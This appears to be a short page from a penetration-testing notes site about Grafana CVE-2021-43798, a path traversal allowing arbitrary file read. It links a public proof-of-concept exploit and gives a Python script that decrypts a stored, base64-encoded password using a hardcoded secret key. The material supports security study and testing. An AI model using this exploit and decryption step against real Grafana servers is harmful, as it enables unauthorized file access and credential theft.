Grafana

CVE-2021-43798 - Path transverse file read

GitHub - pedrohavay/exploit-grafana-CVE-2021-43798: This is a proof-of-concept exploit for Grafana's Unauthorized Arbitrary File Read Vulnerability (CVE-2021-43798).GitHub

Custom script to decode password:

import base64
from secure import decrypt

secret_key = 'SW2YcwTIb9zpOOhoPsMm'
ciphertext = 'anBneWFNQ2z+IDGhz3a7wxaqjimuglSXTeMvhbvsveZwVzreNJSw+hsV4w=='
print(f"[*] Decrypting password: {ciphertext}")
encrypted = base64.b64decode(ciphertext.encode())
try:
    dec_pass, _ = decrypt(encrypted, secret_key)
except:
    dec_pass = None

if dec_pass is None:
    print(f"[!] Unable to decrypt password..\n")
else:
    print(f"[*] Decrypted password: {dec_pass}\n")

PreviousGitea NextGrav CMS

Last updated 2 years ago